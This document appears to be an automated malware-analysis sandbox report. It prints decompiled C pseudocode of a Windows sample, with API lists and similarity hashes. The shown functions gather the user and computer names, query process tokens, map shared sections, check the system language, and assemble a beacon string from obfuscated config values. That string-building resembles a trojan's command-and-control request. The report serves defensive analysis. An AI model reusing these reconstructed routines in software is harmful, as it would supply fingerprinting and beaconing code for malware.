0x04f6664d
0x04f6669e
0x04f666a4
0x04f666ae
0x04f666b0
0x04f666b5
0x04f666c4
0x04f666c8
0x04f666d3
0x04f666da
0x04f666e1
0x04f666e1
0x04f666ed
0x04f666ed
0x04f666c8
0x04f666f6
0x04f666f8
0x04f666fb
0x04f666fd
0x04f66700
0x04f66703
0x04f6670d
0x04f66711
0x04f66715

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 04F66642
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F66659
GetUserNameW.ADVAPI32(00000000,00000000), ref: 04F66666
HeapFree.KERNEL32(00000000,00000000,?,?,04F63A37,?,00000001,00000000), ref: 04F66687
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F666AE
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F666C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F666CF
HeapFree.KERNEL32(00000000,00000000,?,?,04F63A37,?,00000001), ref: 04F666ED

Strings

Ut, xrefs: 04F66687, 04F666ED

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: 1e3ade5d798a5d6278bcedd8b3ba0ac092d6521fc076ef9ae4458c35400ec6f6
Instruction ID: fe2b42e07eaf63158ba4a06003700e4284b082bf790ea6bb4a90df333ae351a3
Opcode Fuzzy Hash: 1e3ade5d798a5d6278bcedd8b3ba0ac092d6521fc076ef9ae4458c35400ec6f6
Instruction Fuzzy Hash: 23311871A0020AEFEB10DFA9ED80AAEB7F9FF48704F114069E556D7210EB75EE019B50

Uniqueness

Uniqueness Score: -1.00%

Function 00401497, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401497(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401F5A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403104;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401F54();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401497
0x004014a0
0x004014a4
0x004014aa
0x004014af
0x004014b4
0x004014b7
0x004014ba
0x004014bf
0x004014c0
0x004014c3
0x004014ce
0x004014d5
0x004014d9
0x004014db
0x004014dc
0x004014df
0x004014e4
0x004014ee
0x004014f0
0x004014f0
0x00401504
0x0040150a
0x0040150e
0x0040155e
0x00401510
0x00401519
0x0040152f
0x00401537
0x00401549
0x0040154d
0x00000000
0x00000000
0x00401539
0x0040153c
0x00401541
0x00401543
0x00401543
0x00401524
0x00401526
0x0040154f
0x00401550
0x00401550
0x00401519
0x00401566

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,0040129E,0000000A,?), ref: 004014A4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 004014BA
_snwprintf.NTDLL ref: 004014DF
CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 00401504
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040129E,0000000A), ref: 0040151B
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0040152F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040129E,0000000A), ref: 00401547
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040129E), ref: 00401550
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040129E,0000000A), ref: 00401558

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 4b663918ecaafb4ef1cf66992703e164e8b7581c7c220b731fcb9416b6dd13e0
Instruction ID: a44958714089166d2d74f8ff3d510649d27067fe0c511753ef71e299d7eb32de
Opcode Fuzzy Hash: 4b663918ecaafb4ef1cf66992703e164e8b7581c7c220b731fcb9416b6dd13e0
Instruction Fuzzy Hash: F421B8B2500218BFD711AFA8CD88E9E77ADEB88354F104036F706FB2E0D6745945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 04F6104E, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E04F6104E(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04F62CDB(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04F61D77(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x04f6105b
0x04f6105c
0x04f6105d
0x04f6105e
0x04f6105f
0x04f61063
0x04f6106a
0x04f61079
0x04f6107c
0x04f6107f
0x04f61086
0x04f61089
0x04f6108c
0x04f6108f
0x04f61092
0x04f6109d
0x04f6109f
0x04f610a8
0x04f610b0
0x04f610b2
0x04f610c4
0x04f610ce
0x04f610d2
0x04f610e1
0x04f610e5
0x04f610ee
0x04f610f6
0x04f610f6
0x04f610f8
0x04f610f8
0x04f61100
0x04f61106
0x04f6110a
0x04f6110a
0x04f61115

APIs

NtOpenProcess.NTDLL(00000001,00000400,?,?), ref: 04F61095
NtOpenProcessToken.NTDLL(00000001,00000008,00000000), ref: 04F610A8
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000001), ref: 04F610C4

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000001,00000001), ref: 04F610E1
memcpy.NTDLL(00000000,00000000,0000001C), ref: 04F610EE
NtClose.NTDLL(00000000), ref: 04F61100
NtClose.NTDLL(00000001), ref: 04F6110A

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: fd706ffacc5e5a7004866778ec12a7eb5bfb5cf67e8726b082a2853798073a71
Instruction ID: 1e44bd8aeac8dea820e4bccf57b4d4a92a72b63ab4f70fbbe8d38ae9abcb1a0b
Opcode Fuzzy Hash: fd706ffacc5e5a7004866778ec12a7eb5bfb5cf67e8726b082a2853798073a71
Instruction Fuzzy Hash: 8B2103B290022CFBDB01AFA5DC85ADEBFBDEB08744F104026FA45E6110D7719A45DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401147, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401147(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401000(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401150
0x00401157
0x00401158
0x00401159
0x0040115a
0x0040115b
0x0040116c
0x00401170
0x00401184
0x00401187
0x0040118a
0x00401191
0x00401194
0x0040119b
0x0040119e
0x004011a1
0x004011a4
0x004011a9
0x004011e4
0x004011ab
0x004011ae
0x004011b4
0x004011b9
0x004011bd
0x004011db
0x004011bf
0x004011c6
0x004011d4
0x004011d4
0x004011bd
0x004011ec

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,00000002), ref: 004011A4

Part of subcall function 00401000: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004011B9,00000002,00000000,?,?,00000000,?,?,004011B9,?), ref: 0040102D

memset.NTDLL ref: 004011C6

Strings

@, xrefs: 00401194

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 039d294532a767a65544ce8228f0db3f2990fa5cc551f84887840228918d62ed
Instruction ID: 152f1ef25f49963ffb35510657332be79d28fda62bb9f8be1b7189acda7cc425
Opcode Fuzzy Hash: 039d294532a767a65544ce8228f0db3f2990fa5cc551f84887840228918d62ed
Instruction Fuzzy Hash: A52108B6D00209AFCB11DFE9C8849EEFBF9EB48354F10443AE605F7250D735AA458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED0, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00401ED0(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x00401ed4
0x00401ee5
0x00401eed
0x00401eef
0x00401f02
0x00401f02
0x00401f0c

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,00401C0A,?,00000000,?,00000000,-00000008,?,?,?,004018B6), ref: 00401EE5
GetSystemDefaultUILanguage.KERNEL32(?,?,00401C0A,?,00000000,?,00000000,-00000008,?,?,?,004018B6,?,00000000), ref: 00401EEF
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,00401C0A,?,00000000,?,00000000,-00000008,?,?,?,004018B6), ref: 00401F02

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: dc1ed00a60c346de0c5d9dbda2c297edea040d28eba22ab3ef0b353327d8e396
Instruction ID: 5abc295989ccb9030898daafade73da04ee1ea42716ea4693a028eeedc811bb2
Opcode Fuzzy Hash: dc1ed00a60c346de0c5d9dbda2c297edea040d28eba22ab3ef0b353327d8e396
Instruction Fuzzy Hash: 82E0BFA4650309B6E710EB91DE4AFBA72A8AB4070AF500195FB51F60D0D6B89E04E669

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401000(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401012
0x00401018
0x00401026
0x0040102d
0x00401032
0x00401038
0x00000000
0x00401039
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004011B9,00000002,00000000,?,?,00000000,?,?,004011B9,?), ref: 0040102D

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 490c933d93e42918c74a86d924130f1caf692d08cb5338aceb5bc3d79483c973
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: D1F037B590020CFFEB119FA5CC85C9FBBBDEB44394B10497AF552E10A1D6309E489B60

Uniqueness

Uniqueness Score: -1.00%

Function 04F66B1C, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 266
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E04F66B1C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				int _t76;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr _t108;
				void* _t110;
				intOrPtr _t115;
				signed int _t119;
				char** _t121;
				int _t124;
				signed int _t126;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr _t136;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t143;
				int _t146;
				void* _t147;
				void* _t148;
				void* _t158;
				int _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t165;
				void* _t167;
				long _t171;
				intOrPtr* _t172;
				intOrPtr* _t175;
				void* _t176;
				void* _t178;
				void* _t179;
				void* _t184;

				_t158 = __edx;
				_t148 = __ecx;
				_t64 = __eax;
				_t147 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t64 = GetTickCount();
				}
				_t65 =  *0x4f6d018; // 0x658828bf
				asm("bswap eax");
				_t66 =  *0x4f6d014; // 0x5cb11ae7
				asm("bswap eax");
				_t67 =  *0x4f6d010; // 0x15dc9586
				asm("bswap eax");
				_t68 =  *0x4f6d00c; // 0x8e03bf7
				asm("bswap eax");
				_t69 =  *0x4f6d230; // 0xf0a5a8
				_t3 = _t69 + 0x4f6e622; // 0x74666f73
				_t161 = wsprintfA(_t147, _t3, 3, 0x3d12b, _t68, _t67, _t66, _t65,  *0x4f6d02c,  *0x4f6d004, _t64);
				_t72 = E04F61D4A();
				_t73 =  *0x4f6d230; // 0xf0a5a8
				_t4 = _t73 + 0x4f6e662; // 0x74707526
				_t76 = wsprintfA(_t161 + _t147, _t4, _t72);
				_t178 = _t176 + 0x38;
				_t162 = _t161 + _t76;
				if(_a8 != 0) {
					_t143 =  *0x4f6d230; // 0xf0a5a8
					_t8 = _t143 + 0x4f6e66d; // 0x732526
					_t146 = wsprintfA(_t162 + _t147, _t8, _a8);
					_t178 = _t178 + 0xc;
					_t162 = _t162 + _t146;
				}
				_t77 = E04F6340E(_t148);
				_t78 =  *0x4f6d230; // 0xf0a5a8
				_t10 = _t78 + 0x4f6e38a; // 0x6d697426
				_t163 = _t162 + wsprintfA(_t162 + _t147, _t10, _t77, _t158);
				_t82 =  *0x4f6d230; // 0xf0a5a8
				_t12 = _t82 + 0x4f6e7b4; // 0x5e78d5c
				_t184 = _a4 - _t12;
				_t14 = _t82 + 0x4f6e33b; // 0x74636126
				_t160 = 0 | _t184 == 0x00000000;
				_t164 = _t163 + wsprintfA(_t163 + _t147, _t14, _t184 == 0);
				_t86 =  *0x4f6d278; // 0x5e795e0
				_t179 = _t178 + 0x1c;
				if(_t86 != 0) {
					_t139 =  *0x4f6d230; // 0xf0a5a8
					_t18 = _t139 + 0x4f6e8f1; // 0x3d736f26
					_t142 = wsprintfA(_t164 + _t147, _t18, _t86);
					_t179 = _t179 + 0xc;
					_t164 = _t164 + _t142;
				}
				_t87 =  *0x4f6d284; // 0x5e795b0
				if(_t87 != 0) {
					_t136 =  *0x4f6d230; // 0xf0a5a8
					_t20 = _t136 + 0x4f6e685; // 0x73797326
					wsprintfA(_t164 + _t147, _t20, _t87);
					_t179 = _t179 + 0xc;
				}
				_t165 =  *0x4f6d2d4; // 0x5e79630
				_t89 = E04F628E2(0x4f6d00a, _t165 + 4);
				_t171 = 0;
				_v12 = _t89;
				if(_t89 == 0) {
					L28:
					RtlFreeHeap( *0x4f6d1f0, _t171, _t147); // executed
					return _a20;
				} else {
					_t92 = RtlAllocateHeap( *0x4f6d1f0, 0, 0x800);
					_a8 = _t92;
					if(_t92 == 0) {
						L27:
						HeapFree( *0x4f6d1f0, _t171, _v12);
						goto L28;
					}
					E04F617C4(GetTickCount());
					_t96 =  *0x4f6d2d4; // 0x5e79630
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x4f6d2d4; // 0x5e79630
					__imp__(_t100 + 0x40);
					_t102 =  *0x4f6d2d4; // 0x5e79630
					_t167 = E04F69488(1, _t160, _t147,  *_t102);
					_v20 = _t167;
					asm("lock xadd [eax], ecx");
					if(_t167 == 0) {
						L26:
						RtlFreeHeap( *0x4f6d1f0, _t171, _a8); // executed
						goto L27;
					}
					StrTrimA(_t167, 0x4f6c2b4);
					_t108 =  *0x4f6d230; // 0xf0a5a8
					_push(_t167);
					_t24 = _t108 + 0x4f6e2d2; // 0x53002f
					_t110 = E04F65F0B(_t24);
					_v8 = _t110;
					if(_t110 == 0) {
						L25:
						RtlFreeHeap( *0x4f6d1f0, _t171, _t167); // executed
						goto L26;
					}
					 *_t167 = 0;
					__imp__(_a8, _v12);
					_t172 = __imp__;
					 *_t172(_a8, _v8);
					 *_t172(_a8, _t167);
					_t115 = E04F620EA(0, _a8);
					_a4 = _t115;
					if(_t115 == 0) {
						_a20 = 8;
						L23:
						E04F6185B();
						L24:
						RtlFreeHeap( *0x4f6d1f0, 0, _v8); // executed
						_t171 = 0;
						goto L25;
					}
					_t119 = E04F63486(_t147, 0xffffffffffffffff, _t167,  &_v16); // executed
					_a20 = _t119;
					if(_t119 == 0) {
						_t175 = _v16;
						_t126 = E04F68B45(_t175, _a4, _a12, _a16); // executed
						_a20 = _t126;
						_t127 =  *((intOrPtr*)(_t175 + 8));
						 *((intOrPtr*)( *_t127 + 0x80))(_t127);
						_t129 =  *((intOrPtr*)(_t175 + 8));
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						_t131 =  *((intOrPtr*)(_t175 + 4));
						 *((intOrPtr*)( *_t131 + 8))(_t131);
						_t133 =  *_t175;
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						E04F61D77(_t175);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t121 = _a12;
							if(_t121 != 0) {
								_t168 =  *_t121;
								_t173 =  *_a16;
								wcstombs( *_t121,  *_t121,  *_a16);
								_t124 = E04F618E8(_t168, _t168, _t173 >> 1);
								_t167 = _v20;
								 *_a16 = _t124;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E04F61D77(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x04f66b1c
0x04f66b1c
0x04f66b1c
0x04f66b25
0x04f66b2a
0x04f66b31
0x04f66b33
0x04f66b33
0x04f66b40
0x04f66b4b
0x04f66b4e
0x04f66b59
0x04f66b5c
0x04f66b61
0x04f66b64
0x04f66b69
0x04f66b6c
0x04f66b78
0x04f66b85
0x04f66b87
0x04f66b8d
0x04f66b92
0x04f66b9d
0x04f66b9f
0x04f66ba2
0x04f66ba8
0x04f66baa
0x04f66bb2
0x04f66bbd
0x04f66bbf
0x04f66bc2
0x04f66bc2
0x04f66bc4
0x04f66bcb
0x04f66bd0
0x04f66bdd
0x04f66bdf
0x04f66be4
0x04f66bec
0x04f66bef
0x04f66bf5
0x04f66c00
0x04f66c02
0x04f66c07
0x04f66c0c
0x04f66c0f
0x04f66c14
0x04f66c1f
0x04f66c21
0x04f66c24
0x04f66c24
0x04f66c26
0x04f66c2d
0x04f66c30
0x04f66c35
0x04f66c3f
0x04f66c41
0x04f66c41
0x04f66c44
0x04f66c52
0x04f66c57
0x04f66c5b
0x04f66c5e
0x04f66e36
0x04f66e3e
0x04f66e4b
0x04f66c64
0x04f66c70
0x04f66c78
0x04f66c7b
0x04f66e26
0x04f66e30
0x00000000
0x04f66e30
0x04f66c87
0x04f66c8c
0x04f66c95
0x04f66ca6
0x04f66caa
0x04f66cb3
0x04f66cb9
0x04f66cc6
0x04f66ccd
0x04f66cd6
0x04f66cdc
0x04f66e16
0x04f66e20
0x00000000
0x04f66e20
0x04f66ce8
0x04f66cee
0x04f66cf3
0x04f66cf4
0x04f66cfb
0x04f66d02
0x04f66d05
0x04f66e08
0x04f66e10
0x00000000
0x04f66e10
0x04f66d0e
0x04f66d14
0x04f66d1d
0x04f66d26
0x04f66d2c
0x04f66d33
0x04f66d3a
0x04f66d3d
0x04f66e4e
0x04f66df0
0x04f66df0
0x04f66df5
0x04f66e00
0x04f66e06
0x00000000
0x04f66e06
0x04f66d47
0x04f66d4e
0x04f66d51
0x04f66d56
0x04f66d61
0x04f66d66
0x04f66d69
0x04f66d6f
0x04f66d75
0x04f66d7b
0x04f66d7e
0x04f66d84
0x04f66d87
0x04f66d8c
0x04f66d90
0x04f66d90
0x04f66d9c
0x04f66da8
0x04f66dac
0x04f66dae
0x04f66db3
0x04f66db5
0x04f66dba
0x04f66dbf
0x04f66dcc
0x04f66dd4
0x04f66dd7
0x04f66dd7
0x04f66db3
0x00000000
0x04f66d9e
0x04f66da2
0x04f66dd9
0x04f66ddc
0x04f66de5
0x00000000
0x00000000
0x00000000
0x00000000
0x04f66de5
0x04f66da4
0x00000000
0x04f66da4
0x04f66d9c

APIs

GetTickCount.KERNEL32 ref: 04F66B33
wsprintfA.USER32 ref: 04F66B80
wsprintfA.USER32 ref: 04F66B9D
wsprintfA.USER32 ref: 04F66BBD
wsprintfA.USER32 ref: 04F66BDB
wsprintfA.USER32 ref: 04F66BFE
wsprintfA.USER32 ref: 04F66C1F
wsprintfA.USER32 ref: 04F66C3F
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F66C70
GetTickCount.KERNEL32 ref: 04F66C81
RtlEnterCriticalSection.NTDLL(05E795F0), ref: 04F66C95
RtlLeaveCriticalSection.NTDLL(05E795F0), ref: 04F66CB3

Part of subcall function 04F69488: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F694B3
Part of subcall function 04F69488: lstrlen.KERNEL32(00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F694BB
Part of subcall function 04F69488: strcpy.NTDLL ref: 04F694D2
Part of subcall function 04F69488: lstrcat.KERNEL32(00000000,00000000), ref: 04F694DD
Part of subcall function 04F69488: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04F623DE,?,00000000,04F623DE,00000000,05E79630), ref: 04F694FA

StrTrimA.SHLWAPI(00000000,04F6C2B4,?,05E79630), ref: 04F66CE8

Part of subcall function 04F65F0B: lstrlen.KERNEL32(04F62415,00000000,00000000,04F62415,0053002F,00000000), ref: 04F65F17
Part of subcall function 04F65F0B: lstrlen.KERNEL32(?), ref: 04F65F1F
Part of subcall function 04F65F0B: lstrcpy.KERNEL32(00000000,?), ref: 04F65F36
Part of subcall function 04F65F0B: lstrcat.KERNEL32(00000000,?), ref: 04F65F41

lstrcpy.KERNEL32(00000000,?), ref: 04F66D14
lstrcat.KERNEL32(00000000,?), ref: 04F66D26
lstrcat.KERNEL32(00000000,00000000), ref: 04F66D2C

Part of subcall function 04F620EA: lstrlen.KERNEL32(?,04F6D2E0,74E47FC0,00000000,04F68EA8,00000001,00000001,?,?,?,04F68A5F,00000001), ref: 04F620F3
Part of subcall function 04F620EA: mbstowcs.NTDLL ref: 04F6211A
Part of subcall function 04F620EA: memset.NTDLL ref: 04F6212C

wcstombs.NTDLL ref: 04F66DBF

Part of subcall function 04F68B45: SysAllocString.OLEAUT32(00000000), ref: 04F68B86
Part of subcall function 04F68B45: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 04F68C08
Part of subcall function 04F68B45: StrStrIW.SHLWAPI(00000000,006E0069), ref: 04F68C47

Part of subcall function 04F61D77: HeapFree.KERNEL32(00000000,00000000,04F69825,00000000,?,?,-00000008), ref: 04F61D83

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 04F66E00
RtlFreeHeap.NTDLL(00000000,00000000,0053002F,00000000), ref: 04F66E10
RtlFreeHeap.NTDLL(00000000,00000000,?,05E79630), ref: 04F66E20
HeapFree.KERNEL32(00000000,?), ref: 04F66E30
RtlFreeHeap.NTDLL(00000000,?), ref: 04F66E3E

Strings

Ut, xrefs: 04F66E00, 04F66E10, 04F66E20, 04F66E30, 04F66E3E

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 2871901346-8415677
Opcode ID: a137fca176ec7ce0e476deb05c0365340abeca486377b750d82e64b933a31961
Instruction ID: d310fd4a2d31d5bddf62c57642afb58f13b3d210d0c2c24a2b34dcec3441917d
Opcode Fuzzy Hash: a137fca176ec7ce0e476deb05c0365340abeca486377b750d82e64b933a31961
Instruction Fuzzy Hash: 52A14C71A00109FFEB11DFA9ED88E9A3BA9FF48354B154425F85AC7210D738E952CFA0

Uniqueness

Uniqueness Score: -1.00%

